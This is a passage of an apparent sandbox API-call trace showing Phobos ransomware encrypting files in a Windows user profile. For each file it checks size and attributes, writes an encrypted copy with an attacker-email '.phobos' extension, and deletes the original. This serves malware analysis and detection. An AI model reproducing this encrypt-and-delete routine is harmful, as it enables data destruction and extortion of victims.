(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.434] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.434] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.435] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.435] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.435] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb400, lpOverlapped=0x0) returned 1 [0207.652] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb410, dwBufLen=0xb410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb410) returned 1 [0207.653] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb410, lpOverlapped=0x0) returned 1 [0207.654] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0207.654] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.654] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0207.654] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.654] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0207.654] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.654] CloseHandle (hObject=0xfc) returned 1 [0207.654] CloseHandle (hObject=0x178) returned 1 [0207.654] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat.LOG1" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat.log1")) returned 1 [0207.655] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.656] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=524288) returned 1 [0207.656] CloseHandle (hObject=0x178) returned 1 [0207.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms")) returned 0x2026 [0207.656] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.656] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.656] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.711] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.711] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x80000, lpOverlapped=0x0) returned 1 [0207.834] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80010, dwBufLen=0x80010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80010) returned 1 [0207.838] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x80010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x80010, lpOverlapped=0x0) returned 1 [0207.845] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0207.845] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.845] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe0, dwBufLen=0xe0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe0) returned 1 [0207.845] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.845] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x192, lpOverlapped=0x0) returned 1 [0207.846] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.846] CloseHandle (hObject=0x178) returned 1 [0207.846] CloseHandle (hObject=0xfc) returned 1 [0207.846] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000002.regtrans-ms")) returned 1 [0207.850] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.850] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1736) returned 1 [0207.850] CloseHandle (hObject=0xfc) returned 1 [0207.850] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount")) returned 0x2020 [0207.850] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.851] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.851] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0207.993] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.993] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6c8, lpOverlapped=0x0) returned 1 [0208.042] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6d0, dwBufLen=0x6d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6d0) returned 1 [0208.042] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6d0, lpOverlapped=0x0) returned 1 [0208.043] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0208.043] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.043] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0208.043] CryptDestroyKey (hKey=0xa328e8) returned 1 [0208.043] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x142, lpOverlapped=0x0) returned 1 [0208.044] CryptDestroyKey (hKey=0xa32928) returned 1 [0208.044] CloseHandle (hObject=0xfc) returned 1 [0208.044] CloseHandle (hObject=0x10c) returned 1 [0208.044] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount")) returned 1 [0208.045] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0208.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.046] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=16384) returned 1 [0208.046] CloseHandle (hObject=0x10c) returned 1 [0208.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat")) returned 0x2020 [0208.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0208.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.046] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0208.046] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0208.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0208.049] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0208.049] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.049] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4000, lpOverlapped=0x0) returned 1 [0208.056] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4010, dwBufLen=0x4010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4010) returned 1 [0208.056] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4010, lpOverlapped=0x0) returned 1 [0208.057] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0208.057] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.057] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0208.057] CryptDestroyKey (hKey=0xa328e8) returned 1 [0208.057] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0208.057] CryptDestroyKey (hKey=0xa32928) returned 1 [0208.057] CloseHandle (hObject=0x10c) returned 1 [0208.058] CloseHandle (hObject=0xfc) returned 1 [0208.058] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat")) returned 1 [0208.059] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0208.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0208.060] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=8192) returned 1 [0208.060] CloseHandle (hObject=0xfc) returned 1 [0208.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk")) returned 0x2020 [0208.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0208.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0208.060] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0208.060] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0208.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0208.061] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.061] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2000, lpOverlapped=0x0) returned 1 [0208.063] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2010, dwBufLen=0x2010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2010) returned 1 [0208.063] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2010, lpOverlapped=0x0) returned 1 [0208.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0208.064] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0208.064] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0208.064] CryptDestroyKey (hKey=0xa328e8) returned 1 [0208.064] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0208.064] CryptDestroyKey (hKey=0xa32928) returned 1 [0208.064] CloseHandle (hObject=0xfc) returned 1 [0208.064] CloseHandle (hObject=0x10c) returned 1 [0208.064] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk")) returned 1 [0208.065] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0208.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0208.066] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2097152) returned 1 [0208.066] CloseHandle (hObject=0x10c) returned 1 [0208.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs")) returned 0x2020 [0208.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0208.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows 